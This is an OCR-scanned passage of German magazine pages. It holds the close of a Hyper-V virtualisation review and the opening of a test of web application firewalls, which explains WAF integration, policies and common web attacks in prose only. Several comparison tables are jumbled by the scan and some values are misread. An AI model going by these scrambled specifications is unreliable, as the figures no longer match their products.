Serielle Ports stellen sich dem Client 
als 8250/16550 FIFO vor, Tastatur und 
Maus erscheinen als gewöhnliche PS/2- 
Ports. Die Grafikhardware gibt sich als 
Microsofts Virtual-Machine-Bus-Video- 
gerät mit 4 MByte Grafikspeicher zu er- 
kennen und verhält sich wie Standard- 
SVGA. Wer SCSI benötigt, kann seinem 
Client noch einen Adaptec-2940-Con- 
troller einrichten. Parallele Schnittstelle, 
USB-Adapter und Soundkarte stellt 
Hyper-V nicht bereit. Die Grenzen der 
Ausstattungen für Clients unter dem 
neuen Virtualisierer aus Redmond zeigt 
die Tabelle. 


Keine große Auswahl 


Als sogenanntes synthetisches Device 
reicht Hyper-V die NIC (Network Inter- 
face Card) durch. Sie ist für die Clients 
erst sichtbar, nachdem der Administra- 
tor Microsofts VM Integration Services 
installiert hat. Die stellt Microsoft aber 
nur für die offiziell unterstützten Be- 
triebssysteme bereit. Für die anderen 
kann man die optional konfigurierbare 
„ältere“ Netzwerkkarte einrichten, die 
einen DECchip 21140 emuliert, aber nur 
für 10/100 MBit Ethernet ausgelegt ist. 
Beiden NIC-Typen kann der Adminis- 
trator auf Wunsch auch ein VLAN-Tag- 
ging aufprägen. 

Hyper-V unterscheidet drei Kate- 
gorien von Netzen: interne, externe und 
private. Interne dienen der Kommunika- 
tion zwischen der Root-Partition und 
Clients respektive Clients untereinander. 
Externe Netze erlauben den Datenver- 
kehr mit fremden Systemen. In privaten 
Netzen können nur lokale Clients unter- 
einander Informationen austauschen. 
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MAC-Adressen zur jeweiligen Netz- 
werkhardware erzeugt entweder der 
Administrator von Hand, oder Hyper-V 
generiert sie (Bridged Networking). Im 
Test hat das System einfach von 00:15: 
SD: AE:B9:00 ausgehend hochgezählt. 

Den von anderen Virtualisierern her 
bekannten Modus NAT (Network Ad- 
dress Translation) kennt Hyper-V 
nicht [1]. Virtuelle Switches gibt es 
dort ebenso wenig. Bleibt noch darauf 
hinzuweisen, dass Hyper-V kein DHCP 
bereitstellt, der Administrator also ins- 
besondere private Netze manuell kon- 
figurieren muss — im Zweifelsfall über 
einen DHCP-Service, der auf einem lo- 
kalen Client läuft. 

Zu den Hyper-V-kompatiblen Be- 
triebssystemen: Den Ankündigungen 
folgend könnte man meinen, Microsoft 
strebt die Kompatibilität mit Linux an. 
Der hauseigene Knowledge-Base-Arti- 
kel 954985 gibt neben den 32- und 64- 
Bit-Versionen von Windows Server 
2003 Service Pack 2 und 2008 sowie 
Windows 2000 Server SP 4 auch SLES 
10 ab SP 1 als offiziell unterstützt an, 
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Dj Tasse == 


Letzteren ebenfalls in beiden verfüg- 
baren Wortbreiten. Vista und XP dekla- 
riert der Hersteller in Abgrenzung zu 
den zuvor genannten Server-OS als 
unterstützte Client-Betriebssysteme. 

Tatsächlich ließ sich unter Hyper-V 
sogar ein DOS 6.22 booten, fdisk konn- 
te eine FAT-16-Partition erstellen und 
format darauf ein Dateisystem anlegen. 
Windows 95, 98 und ME kamen im- 
merhin bis zur Willkommens-Meldung, 
ignorierten dann aber jegliche Tastatur- 
und Mausaktivitäten. Windows NT 
bootete zügig in einen Bluescreen. Win- 
dows 2000 Server ohne Service Pack 4 
führte die Installation bis zur Einrich- 
tung der Hardware durch, fror dann 
aber ein. Alle neueren Microsoft-Be- 
triebssysteme ab Windows XP kamen 
glatt durch die Installation durch — auch 
ohne Servicepack. 

Als Kür musste Hyper-V seine 
Kompatibilität mit anderen OS-Varian- 
ten unter Beweis stellen. Als erster 
Kandidat sollte RHEL 5.1 seine Lauf- 
fähigkeit demonstrieren, die erwar- 
tungsgemäß gegeben war. Danach kam 


Hyper-V 


Kategorie VI Management Server VMware Virtual Center 2.5 

Betriebssystem Windows XP, Server RHEL 4.x, SLES 9, Windows 2000 SPA, Windows Server 2008 
2003, Vista Windows Server 2003 XP SP2, Server 2003 64 Bit 

Umgebung „NET Framework 2.0 JRE1.5 „NET Framework 2.0 „NET Framework 3.0 

CPU 750 MHz (1 GHz empf.) single single, 2 GHz single, 1,4 GHz 

RAM 1 GByte (2 GByte empf.) 2 GByte 2 GByte 512 MByte 

Plattenplatz 100 MByte 30 GByte 560 MByte 10 GByte 

NIC 1x 100 MBit/s 2x 1x 100 MBit/s 1x 100 MBit/s 


Xen Enterprise 


VMware ESX 3.5 


Kategorie Virtual Iron Enterprise Hyper-V 
CPU x64! mit 1,5 GHz Intel VT oder AMD-V Intel Xeon oder AMD x64 mit Intels VT oder 
Opteron AMD-V und 2 GHz 
RAM 1 GByte 2 GByte 1 GByte 512 MByte (2 GByte empf.) 
CD-ROM kA v v v 
HD local ATA, SATA, SCSI ab SATA, SCSI SATA, SCSI ATA, SATA, USB, Firewire, 
16 GByte SCSI ab 40 GByte 
Netzspeicher über FC, iSCSI, NFS FG, iSCSI FC, iSCSI, NFS FG, iSCSI 
1x 100 MBit/s 2x 1x 100 MBit/s 1x 100 MBit/s 


NIC 
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Virtualisierung 


Solaris 10 x86 auf den Prüfstand: Suns 
OS kam zwar durch die Installation und 
den anschließenden Laufzeittest durch, 
verstand sich aber mit der emulierten 
21140-basierten Netzwerkkarte nicht. 
NetBSD 3.1 ließ sich ebenfalls instal- 
lieren, hier wollte jedoch die emulierte 
Grafikkarte den lokalen X11-Betrieb 
nicht erlauben. Ursache könnte eine 
Unverträglichkeit von X11R6 mit der 
virtuellen Grafikhardware sein, zumal 
der Effekt auch bei Red Hat 9 auftrat, 
das nur im Text-Mode installierbar 
war. Selbst Zeta 1.0, das sein Distribu- 
tionsmedium im Multisession-Format 
ausliefert, ließ sich installieren und aus- 
führen. 


Fest gebunden 


Ein paar Anmerkungen: Da immer nur 
ein Client das physische CD/DVD- 
Laufwerk benutzen darf, kann der Start 
eines anderen Clients daran scheitern. 
Zudem zeigt der Hyper-V-Manager 
nicht an, wer gerade das Laufwerk be- 
nutzt. Deshalb ist iteratives Suchen 
durch die Eigenschaften aller aktiven 
Clients nötig, um das von Hyper-V 
immerhin als Hotplug-Gerät bediente 
Device dort zu entfernen. 


Virtualisierer Hyper-V 
Windows 95/98/ME - 
Windows NT 4 - 
Windows 2000 SP 4 vv 
Windows XP vv 
Windows Server 2003 vv 
Windows Vista vv 
Windows Server 2008 vv 
Linux Kernel 2.4 v 
Linux Kernel 2.6 vv 
Mac 05 X - 
FreeBSD/NetBSD v 
Solaris 10 v 
NG 


Zeta 


Die bei Windows übliche Anmelde- 
voraussetzung Ctrl-Alt-Del gelingt — 
ähnlich wie beim VMware ESX 3i — 
auch über Ctrl-Alt-Ende. Das ist auch 
gut so, da aktive Client-Fenster ihren 
Fokus mehrheitlich nur über die Se- 
quenz Ctrl-Alt-Links freigeben und der 
Button, der aus der Toolbar eines Client- 
Fensters die benötigte Tastenkombina- 
tion erzeugt, anders nicht erreichbar ist. 
Lediglich Windows Server 2008 gab 
seinen Fokus mit Rollen des Mauszei- 
gers aus dem Client-Fenster heraus frei. 

Während dynamische virtuelle Fest- 
platten vermöge ihrer Kapazitätsgrenzen 
eine Art „Oversubscription“ ermög- 
lichen, gilt dies für die Hauptspeicher- 
nutzung durch Clients nicht. „Memory 
Ballooning“ — also das dynamische Ver- 
schieben von Speicher zwischen den 
VMs - und andere von Virtualisierern 
eingeführte Features kennt Hyper-V 
nicht; virtueller Speicher der Auslage- 
rungsdatei zählt nicht zu den an Clients 
vergebbaren Speicherressourcen. Ähn- 
liches gilt für die CPUs: Hyper-V garan- 
tiert seinen Clients die zugewiesene 
Rechenleistung. Überschreitet allerdings 
das Aktivieren eines zusätzlichen Clients 
die 100-Prozent-Marke, verweigert Hy- 
per-V mit „Fehler beim lInitialisieren“ 
den Start. 


Fazit 


Vergleichsweise rudimentär wirkt noch 
die angezeigte Ressourcennutzung im 
Hyper-V-Manager. Wer die Alternati- 
ven kennt, sehnt sich nach detaillierten 
Darstellungen der Bedürfnisse seiner 
Clients an den Core-Four-Komponenten 
CPU, Speicher, NIC und Festplatte - am 
liebsten datenbankgestützt und mit vor- 
standsfähigen Monatsstatistiken auf 
Knopfdruck abrufbar. Das alles fehlt bei 
Hyper-V. Zudem ist die Darstellung der 
temporären CPU-Nutzung pro Client, 
gemessen an den Leistungsmerkmalen 
der Wettbewerber, absolut unzureichend. 


Kategorie Xen Enterprise Virtual Iron Enterprise VMware VI 3.5 Hyper-V 
Edition Enterprise 
VCPUs 8/32" 8 4 4 
VRAM (GByte) 32/182 44 44 8 
VDisks 8 15 [M 4 (IDE) + 256 (SCI) 
VCDs 1 1 4 4 
VNICS iR 5 4 8 (synth.) + 4 (emul.) 
VFloppies - j 2 j 
Hotplug-VDisk v - v - 
Hotplug-VCD v v NG NG 
Hotplug-VNIC v - - - 
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© kurze Einarbeitungszeit 


© breite x86- und 
x86_64-OS-Kompatibilität 


© unzureichende Darstellung der 
Ressourcennutzung 


© keine virtuellen Netzwerk-Switches 


Laut Microsoft soll vor allem der 
Mittelstand durch Einsatz des Pro- 
dukts von einer besseren Nutzung der 
Serverressourcen profitieren. Ist eine 
fein granulierte Zuordnung von Netz- 
und Festplatten-/O kein kritisches 
Thema und steht die Live-Migration 
virtueller Systeme nicht zur Debatte, 
scheint der professionelle Einsatz von 
Hyper-V für Konsolidierungsvorhaben 
durchaus attraktiv. 

Wer eher einen praktikablen Virtua- 
lisierer zum Experimentieren sucht, dem 
bietet der Markt genug Alternativen. Im 
Vergleich zu Xen glänzt Hyper-V durch 
breitere Unterstützung aktueller x86-Be- 
triebssysteme, auch wenn einige davon 
nicht in der offiziellen Support-Liste ste- 
hen. Den Markt der Virtualisierer mit 
Kompatibilität zu Windows NT und frü- 
her greift Microsoft nicht an, den dürfen 
weiterhin Virtualbox und VMware un- 
ter sich aufteilen. 

Die bisherigen Bestrebungen Mi- 
crosofts, mit eigenen Virtualisierungs- 
produkten seine Stammkundschaft zu 
begeistern, waren nur von mäßigem Er- 
folg gekrönt. Mit Hyper-V liegt nun ein 
Produkt aus Redmond vor, das neben 
leichtem Zugang zur Technik deutlich 
bessere Einsatzmöglichkeiten zeigt. 
Schade nur, dass die ursprünglich ge- 
steckten Ziele nicht erreicht wurden: 
Hotplug-Ressourcen für alle Core- 
Four-Komponenten und Migration über 
Plattformgrenzen fehlen. (sun) 


DR. FRED HANTELMANN 


ist als IT-Architekt bei der Online 
Systemhaus ES+C GmbH tätig. 
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Acht Web Application Firewalls 


Bevor es brennt 


Michael Dipper, Andreas Kurtz 


Schwachstellen in einer Webanwendung können die gesamte 
IT-Infrastruktur eines Unternehmens gefährden. Als wirkungsvolle 
Schutzkomponente haben sich sogenannte Web Application 


Firewalls etabliert. 


gangs- beziehungsweise Perime- 

terschutz als das Mittel der Wahl, 
externe Angriffe auf die eigene IT-In- 
frastruktur abzuwehren. Am Markt 
finden sich heute viele Firewall-Pro- 
dukte, die diese Aufgabe erfolgreich 
bewältigen. Im Zeitalter von Angriffen 
auf Applikationsebene ist jedoch der 
klassische Perimeterschutz wirkungs- 
los. Durch Einschränkung des Netzver- 
kehrs mit der Außenwelt kann man 
zwar Angriffe auf Netz- und Betriebs- 
systemebene abwehren, die Realität 
hat jedoch noch eine zweite Seite: An- 
griffe auf Applikationsebene gelangen 
ungehindert durch die Firewall, da sie 


L- Zeit galt der klassische Zu- 
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auf frei geschalteten Kommunikations- 
beziehungen beruhen. 

Im Webumfeld spricht man vom so- 
genannten Port-80-Problem: Anfragen 
per HTTP (oder HTTPS) reicht die klas- 
sische Firewall meist ungefiltert an die 
Webserver durch. Um daraus resultie- 
renden Angriffen (siehe Kasten: „An- 
griffe und Gefährdungen“) entgegenzu- 
wirken, muss man die Sicherheit auf den 
höheren Protokollebenen ergänzen. 

Web Application Firewalls (WAFSs) 
kommen zum Einsatz, damit sie die 
Kommunikation auf Applikationsebene 
(HTTP/HTTPS) analysieren. Dabei in- 
spizieren sie die Anfragen an den Web- 
server sowie dessen Antworten vor der 


Auslieferung zurück an den Benutzer 
genau. Das stellt sicher, dass ausschließ- 
lich gutartige Anfragen den Webserver 
erreichen. Angriffe unterdrückt schon 
die WAF und beantwortet sie mit ei- 
ner Fehlerseite. Eine zusätzliche Filte- 
rung der Antwortseiten verhindert, 
dass sensitive Informationen über ein- 
gesetzte Backend-Komponenten ent- 
hüllt werden oder interne Details der 
Webapplikation infolge mangelnder 
Fehlerbehandlung (beispielsweise Ja- 
va Stack Traces) nach außen durch- 
dringen. 

WAFS stehen heute in unterschied- 
lichen Ausprägungen zur Verfügung. 
Eine einfache, aber seltene Variante 
besteht aus einem zusätzlich in den 
Webserver (Apache oder IIS) einzu- 
bindenden Modul. Die zweite ist ein 
vom Webserver unabhängiges, eigen- 
ständiges System: Hier existieren rei- 
ne Softwarelösungen, die es dem Ad- 
ministrator überlassen, eine geeignete 
Betriebssystemplattform bereitzustel- 
len. Etwas häufiger noch kommen so- 
genannte Soft-Appliances zum Ein- 
satz. Hier muss lediglich Hardware 
zur Verfügung stehen. Darauf instal- 
liert ein Administrator über ein Me- 
dium ein komplett vorkonfiguriertes 
Betriebssystem und versieht es mit 
WAF-Diensten. Eine aufwendige Grund- 
konfiguration und Härtung des Betriebs- 
systems entfällt. 

Als besonders performant gelten 
Hardware-Appliances. Dadurch, dass 
man die Softwarekomponenten des Sys- 
tems genau auf die zugrunde liegende 
Spezial-Hardware abstimmen kann, er- 
zielen diese Modelle maximale Durch- 
satzraten. Das Betriebssystem erscheint 
dem Administrator meist transparent 
und es fällt kein Aufwand für Härtung 
oder Patchen an. Produkt-Updates stellt 
der Anbieter in Form neuer Firmware- 
Releases bereit. 


Wahl zwischen Reverse 
Proxy und Bridge 


Die physikalische Integration einer 
WAF hängt von der Infrastruktur eines 
Unternehmens ab. Grundsätzlich stehen 
zwei Alternativen zur Verfügung: Re- 
verse Proxy oder Bridge. 

Im Falle eines Reverse Proxy wird 
das klassische Client-Server-Modell auf- 
gebrochen. Der Benutzer spricht nicht 
mehr direkt mit den Webservern, son- 
dern kommuniziert zunächst mit der 
WAF. Diese terminiert die Verbin- 
dung und baut sie nach erfolgreicher 
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Web Application 
Firewall 


Benutzer 


Integration als Single Homed Reverse 
Proxy (Abb. 1) und als Dual Homed 
Reverse Proxy beziehungsweise 
Bridge (Abb, 2) 


Prüfung der Anfragen neu auf. Die 
Einbindung kann dabei entweder „sin- 
gle“ oder „dual homed“ sein, das heißt 
externes und internes Netz nutzen ent- 
weder eine gemeinsame oder zwei un- 
abhängige Netzschnittstellen (siehe Ab- 
bildungen 1 und 2). 

Bei einer Integration als Bridge bleibt 
die Client-Server-Verbindung bestehen. 
Es sind keinerlei Änderungen der Netz- 
einstellungen erforderlich. Die WAF 
liest den Datenverkehr einfach passiv 
mit und erscheint wie ein weiterer 
Switch im Netz. 

Erfolgt die Kommunikation ver- 
schlüsselt über SSL, muss das System 
Zertifikate und Schlüssel importieren, da 
es die Daten nur im Klartext inspizieren 
kann. Im Reverse Proxy Mode endet die 
SSL-Verbindung dazu auf der WAF, 
und diese führt erst nach erfolgreicher 
Prüfung eine separate Backend-Verbin- 
dung weiter. Im Bridge Mode liest die 
WAF den SSL-Handshake mit und kann 
daher bei bekanntem SSL-Schlüssel den 
Datenverkehr analysieren. 

Im Reverse Proxy Mode unterstüt- 
zen viele Produkte Client-Zertifikate, 
sodass sich der Benutzer durch ein per- 
sönliches Zertifikat gegenüber der WAF 
authentifizieren kann. Eine Authenti- 
fizierung der WAF an Backend-Syste- 
men ist ebenfalls denkbar. In diesem 
Fall würde sich die WAF über ein Ma- 
schinenzertifikat bei den Backend-Sys- 
temen anmelden. 

Besonders hohe Sicherheitsanforde- 
rungen erzwingen bisweilen, dass die 


A-TRACT 


© Eine Web Application Firewall 
kann wirkungsvoll vor Angriffen auf 
Applikationsebene schützen. 


© Die Sicherheit aller genannten 
Produkte ist vergleichbar und hoch. 


© Bei der Auswahl einer WAF stehen 
Integrations- und Betriebsaspekte 
im Vordergrund. 
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Datenbanksysteme 
im Backend 
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Web Application 


Extrahierung gültiger Links 
aus dem Antwort-Datenstrom: 


Interne WAF-Session 
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/kontakt.htmi 
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Webserver 


Firewall 


privaten Schlüssel nicht im Klartext auf 
der Festplatte des WAF-Systems liegen, 
sondern in einem Hardware Security 
Module (HSM). Dieses kann kKrypto- 
grafische Operationen mit hoher Ge- 
schwindigkeit durchführen, wobei die 
privaten Schlüssel das HSM nie verlas- 
sen und deren Bearbeitung nur durch 
besondere Authentifizierung am HSM 
oder im Vier-Augen-Prinzip abläuft. 


Konfiguration darf 
nicht zu komplex sein 


Alle getesteten Produkte bieten ein ho- 
hes Maß an Sicherheit gegenüber An- 
griffen auf der Ebene der Applikations- 
schicht. Eine Kaufentscheidung dürfte 
man heutzutage kaum an diesem Krite- 
rium messen. Viel spannender sind Fra- 
gestellungen wie die Integrationsmög- 
lichkeiten in die eigene Infrastruktur, 
Zusatzfunktionen wie Load Balancing 
beziehungsweise Caching oder die Fle- 
xibilität, die Policy möglichst feingra- 
nular an die eigenen Bedürfnisse an- 
passen zu können — und damit indirekt 
der Betriebsaufwand, den ein spezielles 
Produkt mit sich bringt. 

Diese Kriterien beeinflussen rückwir- 
kend wiederum das Sicherheitsniveau: 
Ist die Konfiguration derart komplex, 
dass der Administrator aus Zeit- und 
Ressourcenmangel nur eine rudimen- 
täre Policy umsetzen kann, verfehlt das 
Produkt schnell seinen eigentlichen 
Einsatzzweck. 

Angriffe gegen Webapplikationen 
werden mitunter durch Enkodierung 
getarnt. Darunter versteht man beispiels- 
weise die Darstellung in einem fremden 
Zeichensatz. Um solche Angriffe zu er- 
kennen, muss die WAF eingehende An- 
fragen zunächst normalisieren, das heißt 
in eine Darstellung konvertieren, die sie 
versteht und analysieren kann. 

Die nächsten Schritte in der Validie- 
rung lassen sich in die beiden Katego- 
rien Blacklist- und Whitelist-basierte 
Prüfungen unterteilen — oft negatives 
oder positives Sicherheitsmodell ge- 


nannt. Aus Sicherheitssicht ist der beste 
Ansatz, alle Eingaben durch entspre- 
chende Whitelists zu validieren. Das 
heißt, für jede URL und für jeden Pa- 
rameter, der an die Applikation geht, 
wird der gültige Wertebereich in der 
WAF hinterlegt. Angreifern fällt es in 
diesem Fall schwer, ihren Schadcode 
einzuschleusen, da dieser üblicherweise 
die Whitelists verletzen würde. 

Alle Produkte ergänzen die Über- 
prüfung durch Blacklists, die nichts an- 
deres sind als Muster mit bekannten 
Angriffen, die sie generisch auf alle 
Benutzereingaben anwenden können. 
Die Angriffsmuster innerhalb einer 
WAF unterscheiden sich grundlegend 
von Mustern, die Intrusion-Detection- 
oder Intrusion-Prevention-Systeme (IDS/ 
IPS) einsetzen. Während ein IDS/IPS 
lediglich einen flachen IP-Datenstrom 
sieht, ohne Inhalte oder Strukturen des 
HTML-Quelltextes zu verstehen, arbei- 
tet die WAF direkt auf der Ebene von 
HTTP: Sie zerlegt jede Anfrage zu- 
nächst in ihre Bestandteile (URLs, 
GET- und POST-Parameter, Cookies, 
Header et cetera) und wendet erst da- 
nach die entsprechenden Prüfungen an, 
wodurch sie wesentlich tieferen Ein- 
blick in die Kommunikation erhält. 
Darüber hinaus sind die Angriffsmuster 
generisch: Ein Angriff über SQL-Injec- 
tion setzt beispielsweise voraus, dass 
der Angreifer valides SQL verwendet. 
Hinterlegt man daher eine Beschrei- 
bung der bekannten SQL-Dialekte in 
der WAF, so sind diese Muster für je- 
den Angriff über SQL Injection gültig, 
ein Update ist nur erforderlich, wenn 
sich die SQL-Syntax ändern sollte. 


Cookies, URL- und 
Formular-Verschlüsselung 


Cookies stellen ebenfalls schützenswer- 
te Objekte dar. Oft hinterlegen unbedarft 
programmierte Applikationen sensiti- 
ve Informationen oder vertrauen dar- 
auf, dass die Werte vor dem Anwen- 
der verborgen sind beziehungsweise 
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Websicherheit 


der sie nicht ändern kann. Abhilfe 
schaffen Funktionen wie Cookie-Ver- 
schlüsselung oder ein Cookie Store, bei 
dem die WAF alle Cookies einsam- 
melt, intern ablegt und nur einen ein- 
zigen, sicheren nach außen hin präsen- 
tiert. Diese Funktion kann man jedoch 
nur schlecht einsetzen, wenn die Ap- 
plikation clientseitig darauf angewie- 
sen ist, die Werte eines Cookies aus- 
zulesen oder zu bearbeiten. 

Schutz vor Foreceful-Browsing-An- 
griffen (siehe den Kasten „Angriffe und 
Gefährdungen“) bietet bisweilen eine 
Whitelist aus gültigen URLs. Einige 
Hersteller gehen das Thema aber trick- 
reicher an, indem sie eine sogenannte 
URL-Verschlüsselung einsetzen. Die 
WAF verschlüsselt dabei alle Hyper- 
links in den ausgesendeten HTML-Sei- 
ten. So mutiert /news/artikel.php?id= 
32234 zu /a437df248920bc3ad2cäIfa. 
Der Angreifer hat ohne Kenntnis des 
Schlüssels keine Chance mehr, URLs 
zu manipulieren oder verborgene URLs 
zu erraten. 

Eine Variante stellt die sogenannte 
dynamische Policy dar: Zunächst identi- 
fiziert die WAF jeden Benutzer an- 
hand eines sicheren Session Cookie. 
Die URLs, die der Benutzer in Form 
von Hyperlinks angezeigt bekommt, 
lernt die WAF mit und speichert sie 
zusammen mit der Session des Benut- 
zers intern ab. Ruft der Benutzer - in 


diesem Fall als Angreifer — eine noch 
nicht gelernte URL auf, gilt dies als An- 
griff und die WAF blockiert die Anfra- 
ge. Der Anwender kann deshalb nur die 
Seiten aufrufen, die über Hyperlinks 
verknüpft sind (siehe Abbildung 3). 

Ebenso wie URLs können beispiels- 
weise Hidden-Parameter oder Auswahl- 
boxen in HTML-Formularen geschützt 
werden: Die WAF lernt gültige Werte 
im Rahmen einer dynamischen Policy 
oder hinterlegt sie als verschlüsselte 
Werte innerhalb des Formulars. 

Die hier beschriebenen Ansätze sto- 
ßen an ihre Grenzen, sobald beispiels- 
weise Javascript URLs clientseitig gene- 
riert oder wenn man über Lesezeichen 
oder Suchmaschinentreffer direkt in die 
Applikation springen kann (die Session 
ist zum Zeitpunkt des Aufrufs nicht 
mehr gültig). 

Sollte es ein Angreifer trotz der ge- 
nannten Sicherheitsfunktionen schaf- 
fen, Schadcode innerhalb der Anwen- 
dung zu platzieren, kann die WAF 
noch intervenieren: Dazu analysiert 
sie ausgehende Daten und unterbindet 
die Auslieferung sensitiver Inhalte wie 
Kreditkartennummern. Eine Seite, die 
solche Daten enthält, würde entweder 
vollständig blockiert oder die entspre- 
chenden Bereiche maskiert. 

Eine andere Variante stellen Daten 
dar, die den Webserver oder einge- 
setzte Softwaremodule charakterisie- 


Herausforderungen für WAFS 


Bei einem Test unter Laborbedingungen ist 
die WAF-Welt meist in Ordnung: Demo- 
applikationen verwenden sauber struktu- 
rierte URLs, sind in einfachem Perl oder 
PHP programmiert und navigieren über 
statische Hyperlinks. Die Realität konfron- 
tiert den Administrator dagegen gerne mit 
seltsam aussehenden URLs oder Parame- 
tern, deren Werte nicht selten einen oder 
mehrere der gültigen RFCs verletzen. Was 
nicht heißen soll, dass diese Anwendungen 
Exoten wären oder in den gängigen Brow- 
sern nicht funktionieren. Einige Beispiele: 


http://portal.company.com/irj/servlet/prt/ 7 
portal/prtroot/pcd!3aportal_content!2fcom.sap. 7 
pet!2f 
platform_add_ons!2fcom.sap.ip.bil2fiViews!2f 7 
com.sap.ip.bi.bex®buildTree=false&NavPath 7 
Update=false 


Bei dieser SAP-Netweaver-URL trennt die 
Anwendung GET-Parameter nicht nur wie 
üblich durch das Fragezeichen ab, sondern 
gibt sie zusätzlich als Teil der URL an. Ei- 
nige WAF-Produkte müssen hier passen, da 
sie nicht alle Parameter erkennen und prü- 
fen können. Den Teil vor dem Fragezeichen 
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dürften sie womöglich als URL verstehen, 
was den Administrator in Bedrängnis bringt, 
da er sich mit ständig wechselnden URL- 
Namen konfrontiert sieht. 


In Oracles HTML DB kann Folgendes 
vorkommen: 


http://www.company.com/htmldb/pls/htmldb/ 7 
fep=463:Buchen: 1227566039909966::NO:: 7 
P2O1_VERANSTALTUNG_ID: 189 


Wer bislang glaubte, GET-Parameter wür- 
den exklusiv durch das „kaufmännische 
Und“ (&) getrennt, der irrt. Doppelpunkte 
oder Semikolons können diese Funktion 
ebenfalls übernehmen. 


Beliebige URLs aus CMS können durch- 
aus Stolpersteine enthalten: 


http://www.heise.de/newsticker/meldung/78642 


Eine so harmlos aussehende URL wie die- 
se kann eine WAF in Bedrängnis bringen. 
Existieren keine Methoden, um die Do- 
kumenten-ID zu parsen, die hier Teil der 
URL ist, kann der Aufbau einer Whitelist 
für URLs schwer sein. 


ren. Viele Webserver sind hier zu ge- 
sprächig konfiguriert und verraten 
dem Angreifer, welche Version zum 
Einsatz kommt, wann der letzte Patch 
stattfand oder welche Datenbank im 
Backend läuft. Aus Fehlerseiten der 
Applikation („ODBC error in table 
USERS“, file not found in /var/www/ 
index.php) können Angreifer ebenfalls 
wertvolle Rückschlüsse auf die Anwen- 
dungsstruktur ziehen. Hier kann die 
WAF die ausgesandten Informationen 
entweder durch Umschreiben oder Ent- 
fernen wirkungsvoll limitieren. 

Einen Schutz vor Denial-of-Service- 
Angriffen ermöglichen viele Produkte. 
Denkbar wäre, im Download-Bereich 
einer Website nur eine begrenzte An- 
zahl an Anfragen pro Sekunde zuzu- 
lassen, während der News-Bereich un- 
eingeschränkt erreichbar bleibt. Eine 
weitere Variante identifiziert den Surfer 
anhand seiner Session und lässt pro Be- 
nutzer nur eine Obergrenze an Anfragen 
zu, sodass dieser nicht die gesamten 
Ressourcen des Backend-Systems für 
sich alleine beanspruchen kann. 


Erstellung einer Policy 


Die Nutzung der vom Hersteller mit- 
gelieferten Blacklists bedarf nur einer 
einfachen Aktivierung. Schwieriger 
gestaltet sich unter Umständen die 
Konfiguration speziell auf die Appli- 
kation angepasster Whitelists. Damit 
die Definition dieser Regeln nicht zum 
ausufernden Projekt gerät, kann ein 
Lernmodus der WAF helfen. Dieser 
extrahiert URLs, Parameter und deren 
zulässige Wertebereiche aus gültigen 
Benutzeranfragen. Schwierig wird dies, 
wenn sich Anwendungen häufig ändern, 
denn jede Änderung bedeutet einen 
Neustart des Lernprozesses. Abhilfe 
schafft die Verwendung der erwähnten 
dynamischen Policies oder ein eher ge- 
nerisches Regelwerk: Dabei werden 
URLs und Parameter nur grob klassi- 
fiziert (entweder durch Platzhalter oder 
reguläre Ausdrücke, beispielsweise 
*.gif statt /images/logo.gif). Hier gilt: 
Je generischer diese Freischaltungen 
erfolgen, desto resistenter ist das Re- 
gelwerk gegenüber Änderungen in der 
Applikation. In der Praxis ergibt diese 
Kombination aus Blacklists und generi- 
schen Whitelists ein hohes Sicherheits- 
niveau bei vertretbarem Administra- 
tionsaufwand. 

Gerade zu Beginn treten gelegentlich 
noch False Positives auf: Die Policy ist 
noch nicht vollständig auf die Applika- 
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Websicherheit 


Web Application 
Firewall 


Umleiten des Netzwerkverkehrs über 
die WAF durch Änderungen am DNS, 
Request-Routing oder NAT 


Webserver 


Äußere Firewall 


Benutzer 


Innere Firewall Datenbanksysteme 


im Backend 


Dynamisches Lernen gültiger URLs zur Laufzeit (Abb. 3) 


tion angepasst und blockiert legitime 
Benutzeranfragen. Ein wichtiges Hilfs- 
mittel bei der Erstellung von Policy-An- 
passungen sind sogenannte One Click 
Refinements. Hier kann ein WAF-Ad- 
ministrator direkt während des Betrach- 
tens von Regelverletzungen aus dem 
Log-Viewer heraus Änderungen vor- 
nehmen, um derartige Anfragen in Zu- 
kunft zuzulassen. 

Befindet sich die WAF schon im 
produktiven Datenstrom, ist für die ers- 
ten Tage des Betriebs ein Passivmodus 
hilfreich. Hier führen Policy-Verletzun- 
gen nicht unmittelbar zum Blockieren 
einer Anfrage, sondern die WAF ver- 
merkt das Ereignis lediglich im Log. 
Die Produkte unterscheiden sich hier in 
ihrer Flexibilität: Einige bieten globale 


Einstellungen, die komplette WAF ent- 
weder passiv oder aktiv zu betreiben, 
andere erlauben es gar, einzelne URL- 
oder Parameterregeln „auf Durchzug“ 
zu schalten. 

Die folgenden Produkte stellen die 
derzeitigen Marktführer im Bereich der 
WAFS dar. Darunter befinden sich so- 
wohl reine Sofwarelösungen als auch 
Appliances, die Hard- und Software 
vereinen. Der Schwerpunkt des Tests 
lag darauf, die Produkte auf ihre Inte- 
grationsmöglichkeiten sowie Alltags- 
tauglichkeit in heterogenen Webserver- 
Umgebungen hin zu vergleichen (zu 
Details siehe die Tabelle). 

Außer den dargestellten Produkten 
sollte die rWeb-Appliance des franzö- 
sischen Herstellers Denyall Bestandteil 


Angriffe und Gefährdungen 


Bei den folgenden Erläuterungen handelt 
es sich um den Top-10-Auszug aus den 
OWASP-Schwachstellen des vorigen Jah- 
res (www.owasp.org/index.php/Top_10_ 
2007). 


Cross-Site Scripting (XSS) zielt darauf 
ab, einem ahnungslosen Anwender bös- 
artigen Skriptcode unterzuschieben. Die 
Schwachstelle liegt in der Webapplikation, 
die Eingaben eines Angreifers nicht aus- 
reichend validiert und diese anschließend 
im Browser des Opfers zur Ausführung 
bringt. Somit ist es unter anderem mög- 
lich, Session Cookies und vertrauliche 
Daten des Opfersystems auszuspähen. 


Injection-Angriffe fußen auf einer unzu- 
reichenden Trennung der Programmlogik 
von Benutzereingaben. Unter Ausnutzung 
dieser Schwachstelle kann ein Angreifer 
Codefragmente einschleusen, die ausge- 
führt werden und die Programmlogik ver- 
ändern. Bekannte Ausprägungen dieser 
Schwachstellenklasse sind SQL Injection, 
XPath Injection, LDAP Injection und 
Command Injection. 
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Unter (Remote) File Inclusion versteht man 
das gezielte Auslesen von Systemdateien, 
von Dateien des Webservers oder kriti- 
schen Dateien der Applikation selbst. 
Manipulation von Eingabeparametern und 
unzureichende Eingabevalidierung erlauben 
es einem Angreifer, beliebige Dateien ein- 
zubinden. Bei der Datenübertragung von 
entfernten Systemen spricht man von einer 
Rembote-File-Inclusion-Schwachstelle. 


Cross-Site Request Forgery (CSRF): Ziel 
dieses Angriffs ist wie bei XSS der Web- 
